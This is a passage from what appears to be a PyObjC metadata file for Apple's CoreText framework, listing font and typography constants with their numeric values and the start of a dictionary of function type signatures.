CTFontUIFontMiniEmphasizedSystem@7$kCTFontUIFontMiniSystem@6$kCTFontUIFontNone@4294967295$kCTFontUIFontPalette@24$kCTFontUIFontPushButton@16$kCTFontUIFontSmallEmphasizedSystem@5$kCTFontUIFontSmallSystem@4$kCTFontUIFontSmallToolbar@22$kCTFontUIFontSystem@2$kCTFontUIFontSystemDetail@19$kCTFontUIFontToolTip@25$kCTFontUIFontToolbar@21$kCTFontUIFontUser@0$kCTFontUIFontUserFixedPitch@1$kCTFontUIFontUtilityWindowTitle@17$kCTFontUIFontViews@8$kCTFontUIFontWindowTitle@15$kCTFontUIOptimizedTrait@4096$kCTFontUnknownClass@0$kCTFontUserFixedPitchFontType@1$kCTFontUserFontType@0$kCTFontUtilityWindowTitleFontType@17$kCTFontVerticalOrientation@2$kCTFontVerticalTrait@2048$kCTFontViewsFontType@8$kCTFontWindowTitleFontType@15$kCTFramePathFillEvenOdd@0$kCTFramePathFillWindingNumber@1$kCTFrameProgressionLeftToRight@2$kCTFrameProgressionRightToLeft@1$kCTFrameProgressionTopToBottom@0$kCTIdentityMappingCharacterCollection@0$kCTJustifiedTextAlignment@3$kCTLeftTextAlignment@0$kCTLineBoundsExcludeTypographicLeading@1$kCTLineBoundsExcludeTypographicShifts@2$kCTLineBoundsIncludeLanguageExtents@32$kCTLineBoundsUseGlyphPathBounds@8$kCTLineBoundsUseHangingPunctuation@4$kCTLineBoundsUseOpticalBounds@16$kCTLineBreakByCharWrapping@1$kCTLineBreakByClipping@2$kCTLineBreakByTruncatingHead@3$kCTLineBreakByTruncatingMiddle@5$kCTLineBreakByTruncatingTail@4$kCTLineBreakByWordWrapping@0$kCTLineTruncationEnd@1$kCTLineTruncationMiddle@2$kCTLineTruncationStart@0$kCTNaturalTextAlignment@4$kCTParagraphStyleSpecifierAlignment@0$kCTParagraphStyleSpecifierBaseWritingDirection@13$kCTParagraphStyleSpecifierCount@18$kCTParagraphStyleSpecifierDefaultTabInterval@5$kCTParagraphStyleSpecifierFirstLineHeadIndent@1$kCTParagraphStyleSpecifierHeadIndent@2$kCTParagraphStyleSpecifierLineBoundsOptions@17$kCTParagraphStyleSpecifierLineBreakMode@6$kCTParagraphStyleSpecifierLineHeightMultiple@7$kCTParagraphStyleSpecifierLineSpacing@10$kCTParagraphStyleSpecifierLineSpacingAdjustment@16$kCTParagraphStyleSpecifierMaximumLineHeight@8$kCTParagraphStyleSpecifierMaximumLineSpacing@14$kCTParagraphStyleSpecifierMinimumLineHeight@9$kCTParagraphStyleSpecifierMinimumLineSpacing@15$kCTParagraphStyleSpecifierParagraphSpacing@11$kCTParagraphStyleSpecifierParagraphSpacingBefore@12$kCTParagraphStyleSpecifierTabStops@4$kCTParagraphStyleSpecifierTailIndent@3$kCTRightTextAlignment@1$kCTRubyAlignmentAuto@0$kCTRubyAlignmentCenter@2$kCTRubyAlignmentDistributeLetter@4$kCTRubyAlignmentDistributeSpace@5$kCTRubyAlignmentEnd@3$kCTRubyAlignmentInvalid@255$kCTRubyAlignmentLineEdge@6$kCTRubyAlignmentStart@1$kCTRubyOverhangAuto@0$kCTRubyOverhangEnd@2$kCTRubyOverhangInvalid@255$kCTRubyOverhangNone@3$kCTRubyOverhangStart@1$kCTRubyPositionAfter@1$kCTRubyPositionBefore@0$kCTRubyPositionCount@4$kCTRubyPositionInline@3$kCTRubyPositionInterCharacter@2$kCTRunDelegateCurrentVersion@1$kCTRunDelegateVersion1@1$kCTRunStatusHasNonIdentityMatrix@4$kCTRunStatusNoStatus@0$kCTRunStatusNonMonotonic@2$kCTRunStatusRightToLeft@1$kCTTextAlignmentCenter@2$kCTTextAlignmentJustified@3$kCTTextAlignmentLeft@0$kCTTextAlignmentNatural@4$kCTTextAlignmentRight@1$kCTUnderlinePatternDash@512$kCTUnderlinePatternDashDot@768$kCTUnderlinePatternDashDotDot@1024$kCTUnderlinePatternDot@256$kCTUnderlinePatternSolid@0$kCTUnderlineStyleDouble@9$kCTUnderlineStyleNone@0$kCTUnderlineStyleSingle@1$kCTUnderlineStyleThick@2$kCTVersionNumber10_10@458752$kCTVersionNumber10_11@524288$kCTVersionNumber10_12@589824$kCTVersionNumber10_13@655360$kCTVersionNumber10_14@720896$kCTVersionNumber10_15@786432$kCTVersionNumber10_5@131072$kCTVersionNumber10_5_2@131073$kCTVersionNumber10_5_3@131074$kCTVersionNumber10_5_5@131075$kCTVersionNumber10_6@196608$kCTVersionNumber10_6_7@196615$kCTVersionNumber10_7@262144$kCTVersionNumber10_8@327680$kCTVersionNumber10_9@393216$kCTWritingDirectionEmbedding@0$kCTWritingDirectionLeftToRight@0$kCTWritingDirectionNatural@-1$kCTWritingDirectionOverride@2$kCTWritingDirectionRightToLeft@1$kCanonicalCompositionOffSelector@1$kCanonicalCompositionOnSelector@0$kCaseSensitiveLayoutOffSelector@1$kCaseSensitiveLayoutOnSelector@0$kCaseSensitiveLayoutType@33$kCaseSensitiveSpacingOffSelector@3$kCaseSensitiveSpacingOnSelector@2$kCharacterAlternativesType@17$kCharacterShapeType@20$kCircleAnnotationSelector@3$kCommonLigaturesOffSelector@3$kCommonLigaturesOnSelector@2$kCompatibilityCompositionOffSelector@3$kCompatibilityCompositionOnSelector@2$kContextualAlternatesOffSelector@1$kContextualAlternatesOnSelector@0$kContextualAlternatesType@36$kContextualLigaturesOffSelector@19$kContextualLigaturesOnSelector@18$kContextualSwashAlternatesOffSelector@5$kContextualSwashAlternatesOnSelector@4$kCursiveConnectionType@2$kCursiveSelector@2$kDecomposeDiacriticsSelector@2$kDecorativeBordersSelector@4$kDefaultCJKRomanSelector@2$kDefaultLowerCaseSelector@0$kDefaultUpperCaseSelector@0$kDesignComplexityType@18$kDesignLevel1Selector@0$kDesignLevel2Selector@1$kDesignLevel3Selector@2$kDesignLevel4Selector@3$kDesignLevel5Selector@4$kDiacriticsType@9$kDiagonalFractionsSelector@2$kDiamondAnnotationSelector@8$kDingbatsSelector@1$kDiphthongLigaturesOffSelector@11$kDiphthongLigaturesOnSelector@10$kDisplayTextSelector@1$kEngravedTextSelector@2$kExpertCharactersSelector@10$kExponentsOffSelector@9$kExponentsOnSelector@8$kFleuronsSelector@3$kFontAlbanianLanguage@36$kFontAmharicLanguage@85$kFontAmharicScript@28$kFontArabicLanguage@12$kFontArabicScript@4$kFontArmenianLanguage@51$kFontArmenianScript@24$kFontAssameseLanguage@68$kFontAymaraLanguage@134$kFontAzerbaijanArLanguage@50$kFontAzerbaijaniLanguage@49$kFontBasqueLanguage@129$kFontBengaliLanguage@67$kFontBengaliScript@13$kFontBulgarianLanguage@44$kFontBurmeseLanguage@77$kFontBurmeseScript@19$kFontByelorussianLanguage@46$kFontCatalanLanguage@130$kFontChewaLanguage@92$kFontChineseScript@2$kFontCopyrightName@0$kFontCroatianLanguage@18$kFontCustom16BitScript@2$kFontCustom816BitScript@1$kFontCustom8BitScript@0$kFontCustomPlatform@4$kFontCyrillicScript@7$kFontCzechLanguage@38$kFontDanishLanguage@7$kFontDescriptionName@10$kFontDesignerName@9$kFontDesignerURLName@12$kFontDevanagariScript@9$kFontDutchLanguage@4$kFontDzongkhaLanguage@137$kFontEastEuropeanRomanScript@29$kFontEnglishLanguage@0$kFontEsperantoLanguage@94$kFontEstonianLanguage@27$kFontEthiopicScript@28$kFontExtendedArabicScript@31$kFontFaeroeseLanguage@30$kFontFamilyName@1$kFontFarsiLanguage@31$kFontFinnishLanguage@13$kFontFlemishLanguage@34$kFontFrenchLanguage@1$kFontFullName@4$kFontGallaLanguage@87$kFontGeezScript@28$kFontGeorgianLanguage@52$kFontGeorgianScript@23$kFontGermanLanguage@2$kFontGreekLanguage@14$kFontGreekScript@6$kFontGuaraniLanguage@133$kFontGujaratiLanguage@69$kFontGujaratiScript@11$kFontGurmukhiScript@10$kFontHebrewLanguage@10$kFontHebrewScript@5$kFontHindiLanguage@21$kFontHungarianLanguage@26$kFontISO10646_1993Semantics@2$kFontIcelandicLanguage@15$kFontIndonesianLanguage@81$kFontIrishLanguage@35$kFontItalianLanguage@3$kFontJapaneseLanguage@11$kFontJapaneseScript@1$kFontJavaneseRomLanguage@138$kFontKannadaLanguage@73$kFontKannadaScript@16$kFontKashmiriLanguage@61$kFontKazakhLanguage@48$kFontKhmerLanguage@78$kFontKhmerScript@20$kFontKirghizLanguage@54$kFontKoreanLanguage@23$kFontKoreanScript@3$kFontKurdishLanguage@60$kFontLaoLanguage@79$kFontLaotianScript@22$kFontLappishLanguage@29$kFontLastReservedName@255$kFontLatinLanguage@131$kFontLatvianLanguage@28$kFontLettishLanguage@28$kFontLicenseDescriptionName@13$kFontLicenseInfoURLName@14$kFontLithuanianLanguage@24$kFontMacCompatibleFullName@18$kFontMacedonianLanguage@43$kFontMacintoshPlatform@1$kFontMalagasyLanguage@93$kFontMalayArabicLanguage@84$kFontMalayRomanLanguage@83$kFontMalayalamLanguage@72$kFontMalayalamScript@17$kFontMalteseLanguage@16$kFontManufacturerName@8$kFontMarathiLanguage@66$kFontMicrosoftPlatform@3$kFontMicrosoftStandardScript@1$kFontMicrosoftSymbolScript@0$kFontMicrosoftUCS4Script@10$kFontMoldavianLanguage@53$kFontMongolianCyrLanguage@58$kFontMongolianLanguage@57$kFontMongolianScript@27$kFontNepaliLanguage@64$kFontNoLanguageCode@4294967295$kFontNoNameCode@4294967295$kFontNoPlatformCode@4294967295$kFontNoScriptCode@4294967295$kFontNorwegianLanguage@9$kFontOriyaLanguage@71$kFontOriyaScript@12$kFontOromoLanguage@87$kFontPashtoLanguage@59$kFontPersianLanguage@31$kFontPolishLanguage@25$kFontPortugueseLanguage@8$kFontPostScriptCIDName@20$kFontPostscriptName@6$kFontPreferredFamilyName@16$kFontPreferredSubfamilyName@17$kFontPunjabiLanguage@70$kFontQuechuaLanguage@132$kFontRSymbolScript@8$kFontReservedPlatform@2$kFontRomanScript@0$kFontRomanianLanguage@37$kFontRuandaLanguage@90$kFontRundiLanguage@91$kFontRussian@7$kFontRussianLanguage@32$kFontSaamiskLanguage@29$kFontSampleTextName@19$kFontSanskritLanguage@65$kFontSerbianLanguage@42$kFontSimpChineseLanguage@33$kFontSimpleChineseScript@25$kFontSindhiLanguage@62$kFontSindhiScript@31$kFontSinhaleseLanguage@76$kFontSinhaleseScript@18$kFontSlavicScript@29$kFontSlovakLanguage@39$kFontSlovenianLanguage@40$kFontSomaliLanguage@88$kFontSpanishLanguage@6$kFontStyleName@2$kFontSundaneseRomLanguage@139$kFontSwahiliLanguage@89$kFontSwedishLanguage@5$kFontTagalogLanguage@82$kFontTajikiLanguage@55$kFontTamilLanguage@74$kFontTamilScript@14$kFontTatarLanguage@135$kFontTeluguLanguage@75$kFontTeluguScript@15$kFontThaiLanguage@22$kFontThaiScript@21$kFontTibetanLanguage@63$kFontTibetanScript@26$kFontTigrinyaLanguage@86$kFontTradChineseLanguage@19$kFontTrademarkName@7$kFontTraditionalChineseScript@2$kFontTurkishLanguage@17$kFontTurkmenLanguage@56$kFontUighurLanguage@136$kFontUkrainianLanguage@45$kFontUnicodeDefaultSemantics@0$kFontUnicodePlatform@0$kFontUnicodeV1_1Semantics@1$kFontUnicodeV2_0BMPOnlySemantics@3$kFontUnicodeV2_0FullCoverageSemantics@4$kFontUnicodeV4_0VariationSequenceSemantics@5$kFontUnicode_FullRepertoire@6$kFontUninterpretedScript@32$kFontUniqueName@3$kFontUrduLanguage@20$kFontUzbekLanguage@47$kFontVendorURLName@11$kFontVersionName@5$kFontVietnameseLanguage@80$kFontVietnameseScript@30$kFontWelshLanguage@128$kFontYiddishLanguage@41$kFormInterrobangOffSelector@7$kFormInterrobangOnSelector@6$kFractionsType@11$kFullWidthCJKRomanSelector@3$kFullWidthIdeographsSelector@0$kFullWidthKanaSelector@0$kHalfWidthCJKRomanSelector@0$kHalfWidthIdeographsSelector@2$kHalfWidthTextSelector@2$kHanjaToHangulAltOneSelector@7$kHanjaToHangulAltThreeSelector@9$kHanjaToHangulAltTwoSelector@8$kHanjaToHangulSelector@1$kHideDiacriticsSelector@1$kHiraganaToKatakanaSelector@2$kHistoricalLigaturesOffSelector@21$kHistoricalLigaturesOnSelector@20$kHojoCharactersSelector@12$kHyphenToEnDashOffSelector@3$kHyphenToEnDashOnSelector@2$kHyphenToMinusOffSelector@1$kHyphenToMinusOnSelector@0$kHyphensToEmDashOffSelector@1$kHyphensToEmDashOnSelector@0$kIdeographicAltFiveSelector@5$kIdeographicAltFourSelector@4$kIdeographicAltOneSelector@1$kIdeographicAltThreeSelector@3$kIdeographicAltTwoSelector@2$kIdeographicAlternativesType@30$kIdeographicSpacingType@26$kIlluminatedCapsSelector@3$kInequalityLigaturesOffSelector@7$kInequalityLigaturesOnSelector@6$kInferiorsSelector@2$kInitialCapsAndSmallCapsSelector@5$kInitialCapsSelector@4$kInternationalSymbolsSelector@5$kInvertedBoxAnnotationSelector@9$kInvertedCircleAnnotationSelector@4$kInvertedRoundedBoxAnnotationSelector@10$kItalicCJKRomanType@32$kJIS1978CharactersSelector@2$kJIS1983CharactersSelector@3$kJIS1990CharactersSelector@4$kJIS2004CharactersSelector@11$kJUSTCurrentVersion@65536$kJUSTKashidaPriority@0$kJUSTLetterPriority@2$kJUSTNullPriority@3$kJUSTOverrideLimits@16384$kJUSTOverridePriority@32768$kJUSTOverrideUnlimited@8192$kJUSTPriorityCount@4$kJUSTPriorityMask@3$kJUSTSpacePriority@1$kJUSTStandardFormat@0$kJUSTTag@1786082164$kJUSTUnlimited@4096$kJUSTnoGlyphcode@65535$kJUSTpcConditionalAddAction@2$kJUSTpcDecompositionAction@0$kJUSTpcDuctilityAction@4$kJUSTpcGlyphRepeatAddAction@5$kJUSTpcGlyphStretchAction@3$kJUSTpcUnconditionalAddAction@1$kKERNCrossStream@16384$kKERNCrossStreamResetNote@2$kKERNCurrentVersion@65536$kKERNFormatMask@255$kKERNIndexArray@3$kKERNLineEndKerning@2$kKERNLineStart@1$kKERNNoCrossKerning@4$kKERNNoStakeNote@1$kKERNNotApplied@1$kKERNNotesRequested@8$kKERNOrderedList@0$kKERNResetCrossStream@32768$kKERNSimpleArray@2$kKERNStateTable@1$kKERNTag@1801810542$kKERNUnusedBits@7936$kKERNVariation@8192$kKERNVertical@32768$kKERXActionOffsetMask@16777215$kKERXActionTypeAnchorPoints@1073741824$kKERXActionTypeControlPoints@0$kKERXActionTypeCoordinates@2147483648$kKERXActionTypeMask@3221225472$kKERXControlPoint@4$kKERXCrossStream@1073741824$kKERXCrossStreamResetNote@2$kKERXCurrentVersion@131072$kKERXDescending@268435456$kKERXFormatMask@255$kKERXLineEndKerning@2$kKERXLineStart@1$kKERXNoCrossKerning@4$kKERXNoStakeNote@1$kKERXNotApplied@1$kKERXNotesRequested@8$kKERXOrderedList@0$kKERXResetCrossStream@32768$kKERXSimpleArray@2$kKERXStateTable@1$kKERXTag@1801810552$kKERXUnusedBits@268435200$kKERXUnusedFlags@1056964608$kKERXValuesAreLong@1$kKERXVariation@536870912$kKERXVertical@-2147483648$kKanaSpacingType@25$kKanaToRomanizationSelector@4$kKatakanaToHiraganaSelector@3$kLCARCtlPointFormat@1$kLCARCurrentVersion@65536$kLCARLinearFormat@0$kLCARTag@1818452338$kLTAGCurrentVersion@1$kLanguageTagType@39$kLastFeatureType@-1$kLetterCaseType@3$kLigaturesType@1$kLineFinalSwashesOffSelector@7$kLineFinalSwashesOnSelector@6$kLineInitialSwashesOffSelector@5$kLineInitialSwashesOnSelector@4$kLinguisticRearrangementOffSelector@1$kLinguisticRearrangementOnSelector@0$kLinguisticRearrangementType@5$kLogosOffSelector@7$kLogosOnSelector@6$kLowerCaseNumbersSelector@0$kLowerCasePetiteCapsSelector@2$kLowerCaseSmallCapsSelector@1$kLowerCaseType@37$kMORTContextualType@1$kMORTCoverDescending@16384$kMORTCoverIgnoreVertical@8192$kMORTCoverTypeMask@15$kMORTCoverVertical@32768$kMORTCurrInsertBefore@2048$kMORTCurrInsertCountMask@992$kMORTCurrInsertCountShift@5$kMORTCurrInsertKashidaLike@8192$kMORTCurrJustTableCountMask@127$kMORTCurrJustTableCountShift@0$kMORTCurrentVersion@65536$kMORTDoInsertionsBefore@128$kMORTInsertionType@5$kMORTInsertionsCountMask@63$kMORTIsSplitVowelPiece@64$kMORTLigFormOffsetMask@1073741823$kMORTLigFormOffsetShift@2$kMORTLigLastAction@-2147483648$kMORTLigStoreLigature@1073741824$kMORTLigatureType@2$kMORTMarkInsertBefore@1024$kMORTMarkInsertCountMask@31$kMORTMarkInsertCountShift@0$kMORTMarkInsertKashidaLike@4096$kMORTMarkJustTableCountMask@16256$kMORTMarkJustTableCountShift@7$kMORTRearrangementType@0$kMORTSwashType@4$kMORTTag@1836020340$kMORTraCDx@6$kMORTraCDxA@8$kMORTraCDxAB@12$kMORTraCDxBA@13$kMORTraDCx@7$kMORTraDCxA@9$kMORTraDCxAB@14$kMORTraDCxBA@15$kMORTraDx@2$kMORTraDxA@3$kMORTraDxAB@10$kMORTraDxBA@11$kMORTraNoAction@0$kMORTraxA@1$kMORTraxAB@4$kMORTraxBA@5$kMORXCoverDescending@1073741824$kMORXCoverIgnoreVertical@536870912$kMORXCoverLogicalOrder@268435456$kMORXCoverTypeMask@255$kMORXCoverVertical@-2147483648$kMORXCurrentVersion@131072$kMORXTag@1836020344$kMathSymbolsSelector@6$kMathematicalExtrasType@15$kMathematicalGreekOffSelector@11$kMathematicalGreekOnSelector@10$kMonospacedNumbersSelector@0$kMonospacedTextSelector@1$kNLCCharactersSelector@13$kNoAlternatesSelector@0$kNoAnnotationSelector@0$kNoCJKItalicRomanSelector@0$kNoCJKSymbolAlternativesSelector@0$kNoFractionsSelector@0$kNoIdeographicAlternativesSelector@0$kNoOrnamentsSelector@0$kNoRubyKanaSelector@0$kNoStyleOptionsSelector@0$kNoStylisticAlternatesSelector@0$kNoTransliterationSelector@0$kNonFinalSwashesOffSelector@9$kNonFinalSwashesOnSelector@8$kNormalPositionSelector@0$kNumberCaseType@21$kNumberSpacingType@6$kOPBDControlPointFormat@1$kOPBDCurrentVersion@65536$kOPBDDistanceFormat@0$kOPBDTag@1869636196$kOrdinalsSelector@3$kOrnamentSetsType@16$kOverlappingCharactersType@13$kPROPALDirectionClass@2$kPROPANDirectionClass@6$kPROPBNDirectionClass@19$kPROPCSDirectionClass@7$kPROPCanHangLTMask@16384$kPROPCanHangRBMask@8192$kPROPCurrentVersion@196608$kPROPDirectionMask@31$kPROPENDirectionClass@3$kPROPESDirectionClass@4$kPROPETDirectionClass@5$kPROPIsFloaterMask@32768$kPROPLDirectionClass@0$kPROPLREDirectionClass@13$kPROPLRODirectionClass@14$kPROPNSMDirectionClass@18$kPROPNumDirectionClasses@20$kPROPONDirectionClass@11$kPROPPDFDirectionClass@17$kPROPPSDirectionClass@8$kPROPPairOffsetMask@3840$kPROPPairOffsetShift@8$kPROPPairOffsetSign@7$kPROPRDirectionClass@1$kPROPRLEDirectionClass@15$kPROPRLODirectionClass@16$kPROPRightConnectMask@128$kPROPSDirectionClass@9$kPROPSENDirectionClass@12$kPROPTag@1886547824$kPROPUseRLPairMask@4096$kPROPWSDirectionClass@10$kPROPZeroReserved@96$kParenthesisAnnotationSelector@5$kPartiallyConnectedSelector@1$kPeriodAnnotationSelector@6$kPeriodsToEllipsisOffSelector@11$kPeriodsToEllipsisOnSelector@10$kPiCharactersSelector@2$kPreventOverlapOffSelector@1$kPreventOverlapOnSelector@0$kProportionalCJKRomanSelector@1$kProportionalIdeographsSelector@1$kProportionalKanaSelector@1$kProportionalNumbersSelector@1$kProportionalTextSelector@0$kQuarterWidthNumbersSelector@3$kQuarterWidthTextSelector@4$kRareLigaturesOffSelector@5$kRareLigaturesOnSelector@4$kRebusPicturesOffSelector@9$kRebusPicturesOnSelector@8$kRequiredLigaturesOffSelector@1$kRequiredLigaturesOnSelector@0$kRomanNumeralAnnotationSelector@7$kRomanizationToHiraganaSelector@5$kRomanizationToKatakanaSelector@6$kRoundedBoxAnnotationSelector@2$kRubyKanaOffSelector@3$kRubyKanaOnSelector@2$kRubyKanaSelector@1$kRubyKanaType@28$kSFNTLookupSegmentArray@4$kSFNTLookupSegmentSingle@2$kSFNTLookupSimpleArray@0$kSFNTLookupSingleTable@6$kSFNTLookupTrimmedArray@8$kSFNTLookupVector@10$kSTClassDeletedGlyph@2$kSTClassEndOfLine@3$kSTClassEndOfText@0$kSTClassOutOfBounds@1$kSTKCrossStreamReset@8192$kSTLigActionMask@16383$kSTMarkEnd@8192$kSTNoAdvance@16384$kSTRearrVerbMask@15$kSTSetMark@32768$kSTXHasLigAction@8192$kScientificInferiorsSelector@4$kShowDiacriticsSelector@0$kSimplifiedCharactersSelector@1$kSlashToDivideOffSelector@5$kSlashToDivideOnSelector@4$kSlashedZeroOffSelector@5$kSlashedZeroOnSelector@4$kSmallCapsSelector@3$kSmartQuotesOffSelector@9$kSmartQuotesOnSelector@8$kSmartSwashType@8$kSquaredLigaturesOffSelector@13$kSquaredLigaturesOnSelector@12$kStyleOptionsType@19$kStylisticAltEightOffSelector@17$kStylisticAltEightOnSelector@16$kStylisticAltEighteenOffSelector@37$kStylisticAltEighteenOnSelector@36$kStylisticAltElevenOffSelector@23$kStylisticAltElevenOnSelector@22$kStylisticAltFifteenOffSelector@31$kStylisticAltFifteenOnSelector@30$kStylisticAltFiveOffSelector@11$kStylisticAltFiveOnSelector@10$kStylisticAltFourOffSelector@9$kStylisticAltFourOnSelector@8$kStylisticAltFourteenOffSelector@29$kStylisticAltFourteenOnSelector@28$kStylisticAltNineOffSelector@19$kStylisticAltNineOnSelector@18$kStylisticAltNineteenOffSelector@39$kStylisticAltNineteenOnSelector@38$kStylisticAltOneOffSelector@3$kStylisticAltOneOnSelector@2$kStylisticAltSevenOffSelector@15$kStylisticAltSevenOnSelector@14$kStylisticAltSeventeenOffSelector@35$kStylisticAltSeventeenOnSelector@34$kStylisticAltSixOffSelector@13$kStylisticAltSixOnSelector@12$kStylisticAltSixteenOffSelector@33$kStylisticAltSixteenOnSelector@32$kStylisticAltTenOffSelector@21$kStylisticAltTenOnSelector@20$kStylisticAltThirteenOffSelector@27$kStylisticAltThirteenOnSelector@26$kStylisticAltThreeOffSelector@7$kStylisticAltThreeOnSelector@6$kStylisticAltTwelveOffSelector@25$kStylisticAltTwelveOnSelector@24$kStylisticAltTwentyOffSelector@41$kStylisticAltTwentyOnSelector@40$kStylisticAltTwoOffSelector@5$kStylisticAltTwoOnSelector@4$kStylisticAlternativesType@35$kSubstituteVerticalFormsOffSelector@1$kSubstituteVerticalFormsOnSelector@0$kSuperiorsSelector@1$kSwashAlternatesOffSelector@3$kSwashAlternatesOnSelector@2$kSymbolLigaturesOffSelector@17$kSymbolLigaturesOnSelector@16$kTRAKCurrentVersion@65536$kTRAKTag@1953653099$kTRAKUniformFormat@0$kTallCapsSelector@5$kTextSpacingType@22$kThirdWidthNumbersSelector@2$kThirdWidthTextSelector@3$kTitlingCapsSelector@4$kTraditionalAltFiveSelector@9$kTraditionalAltFourSelector@8$kTraditionalAltOneSelector@5$kTraditionalAltThreeSelector@7$kTraditionalAltTwoSelector@6$kTraditionalCharactersSelector@0$kTraditionalNamesCharactersSelector@14$kTranscodingCompositionOffSelector@5$kTranscodingCompositionOnSelector@4$kTransliterationType@23$kTypographicExtrasType@14$kUnconnectedSelector@0$kUnicodeDecompositionType@27$kUpperAndLowerCaseSelector@0$kUpperCaseNumbersSelector@1$kUpperCasePetiteCapsSelector@2$kUpperCaseSmallCapsSelector@1$kUpperCaseType@38$kVerticalFractionsSelector@1$kVerticalPositionType@10$kVerticalSubstitutionType@4$kWordFinalSwashesOffSelector@3$kWordFinalSwashesOnSelector@2$kWordInitialSwashesOffSelector@1$kWordInitialSwashesOnSelector@0$nameFontTableTag@1851878757$nonGlyphID@65535$os2FontTableTag@1330851634$sizeof_sfntCMapEncoding@8$sizeof_sfntCMapExtendedSubHeader@12$sizeof_sfntCMapHeader@4$sizeof_sfntCMapSubHeader@6$sizeof_sfntDescriptorHeader@8$sizeof_sfntDirectory@12$sizeof_sfntInstance@4$sizeof_sfntNameHeader@6$sizeof_sfntNameRecord@12$sizeof_sfntVariationAxis@20$sizeof_sfntVariationHeader@16$variationFontTableTag@1719034226$''' misc.update({}) functions={'CTFontManagerCreateFontDescriptorsFromURL': (b'^{__CFArray=}^{__CFURL=}', '', {'retval': {'already_cfretained': True}}), 'CTLineCreateTruncatedLine': (b'^{__CTLine=}^{__CTLine=}dI^{__CTLine=}', '', {'retval': {'already_cfretained': True}}), 'CTLineEnumerateCaretOffsets': (b'v^{__CTLine=}@?', '', {'retval': {'type': 'v'}, 'arguments': {1: {'callable': {'retval': {'type': b'v'}, 'arguments': {0: {'type': '^v'}, 1: {'type': 'd'}, 2: {'type': 'L'}, 3: {'type': 'B'}, 4: {'type': 'o^B'}}}, 'block': {'retval': {'type': b'v'}, 'arguments': {0: {'type': b'd'}, 1: {'type': b'q'}, 2: {'type': b'B'}, 3: {'type': b'^B'}}}}}}), 'CTFramesetterCreateFrame': (sel32or64(b'^{__CTFrame=}^{__CTFramesetter=}{_CFRange=ll}^{CGPath=}^{__CFDictionary=}', b'^{__CTFrame=}^{__CTFramesetter=}{_CFRange=qq}^{CGPath=}^{__CFDictionary=}'), '', {'retval': {'already_cfretained': True}}), 'CTTypesetterSuggestClusterBreak': (sel32or64(b'l^{__CTTypesetter=}ld', b'q^{__CTTypesetter=}qd'),), 'CTFontCreateCopyWithFamily': (sel32or64(b'^{__CTFont=}^{__CTFont=}f^{CGAffineTransform=ffffff}^{__CFString=}', b'^{__CTFont=}^{__CTFont=}d^{CGAffineTransform=dddddd}^{__CFString=}'), '', {'retval': {'already_cfretained': True}}), 'CTFontGetGlyphsForCharacters': (sel32or64(b'B^{__CTFont=}^T^Sl', b'B^{__CTFont=}^T^Sq'), '', {'arguments': {1: {'c_array_length_in_arg': 3, 'type_modifier': 'n'}, 2: {'c_array_length_in_arg': 3, 'type_modifier': 'o'}}}), 'CTLineGetPenOffsetForFlush': (sel32or64(b'd^{__CTLine=}fd', b'd^{__CTLine=}dd'),), 'CTTypesetterSuggestLineBreak': (sel32or64(b'l^{__CTTypesetter=}ld', b'q^{__CTTypesetter=}qd'),), 'CTFontCreateWithGraphicsFont': (sel32or64(b'^{__CTFont=}^{CGFont=}f^{CGAffineTransform=ffffff}^{__CTFontDescriptor=}', b'^{__CTFont=}^{CGFont=}d^{CGAffineTransform=dddddd}^{__CTFontDescriptor=}'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTRunGetStringRange': (sel32or64(b'{_CFRange=ll}^{__CTRun=}', b'{_CFRange=qq}^{__CTRun=}'),), 'CTFontCreateWithQuickdrawInstance': (sel32or64(b'^{__CTFont=}*sCf', b'^{__CTFont=}*sCd'), '', {'retval': {'already_cfretained': True}}), 'CTFontManagerUnregisterFontsForURL': (b'B^{__CFURL=}I^^{__CFError=}', '', {'arguments': {2: {'already_cfretained': True, 'type_modifier': 'o', 'null_accepted': True}}}), 'CTFontManagerCreateFontRequestRunLoopSource': (sel32or64(b'^{__CFRunLoopSource=}l@?', b'^{__CFRunLoopSource=}q@?'), '', {'retval': {'already_cfretained': True}, 'arguments': {1: {'callable': {'retval': {'type': b'@'}, 'arguments': {0: {'type': '^v'}, 1: {'type': '@'}, 2: {'type': 'i'}}}}}}), 'CTFontManagerRequestFonts': (b'v^{__CFArray=}@?', '', {'arguments': {1: {'block': {'retval': {'type': b'v'}, 'arguments': {0: {'type': b'^{__CFArray=}'}}}}}}), 'CTRubyAnnotationCreateWithAttributes': (b'@LLL@@', '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorMatchFontDescriptorsWithProgressHandler': (b'B^{__CFArray=}^{__CFSet=}@?',), 'CTGlyphInfoGetGlyph': (b'S^{__CTGlyphInfo=}',), 'CTFontManagerUnregisterFontURLs': (b'v^{__CFArray=}I@?', '', {'arguments': {2: {'callable': {'retval': {'type': b'B'}, 'arguments': {0: {'type': '^v'}, 1: {'type': '@'}, 2: {'type': 'B'}}}, 'block': {'retval': {'type': b'B'}, 'arguments': {0: {'type': b'^{__CFArray=}'}, 1: {'type': b'B'}}}}}}), 'CTFontManagerCreateFontDescriptorsFromData': (b'^{__CFArray=}^{__CFData=}', '', {'retval': {'already_cfretained': True}}), 'CTRunDelegateGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontManagerRegisterFontURLs': (b'v^{__CFArray=}IB@?', '', {'arguments': {3: {'callable': {'retval': {'type': b'B'}, 'arguments': {0: {'type': '^v'}, 1: {'type': '@'}, 2: {'type': 'B'}}}, 'block': {'retval': {'type': b'B'}, 'arguments': {0: {'type': b'^{__CFArray=}'}, 1: {'type': b'B'}}}}}}), 'CTFontCopyAvailableTables': (b'^{__CFArray=}^{__CTFont=}I', '', {'retval': {'already_cfretained': True}}), 'CTFontManagerCompareFontFamilyNames': (sel32or64(b'l^{__CFString=}^{__CFString=}^v', b'q^{__CFString=}^{__CFString=}^v'),), 'CTRubyAnnotationCreate': (sel32or64(b'^{__CTRubyAnnotation=}CCf[4^{__CFString=}]', b'^{__CTRubyAnnotation=}CCd[4^{__CFString=}]'), '', {'retval': {'already_cfretained': True}, 'arguments': {3: {'type_modifier': 'n'}}}), 'CTRunGetStringIndicesPtr': (sel32or64(b'r^i^{__CTRun=}', b'r^q^{__CTRun=}'), '', {'retval': {'c_array_of_variable_length': True}}), 'CTFontGetAscent': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFontManagerRegisterGraphicsFont': (b'B^{CGFont=}^^{__CFError=}', '', {'arguments': {1: {'already_cfretained': True, 'type_modifier': 'o', 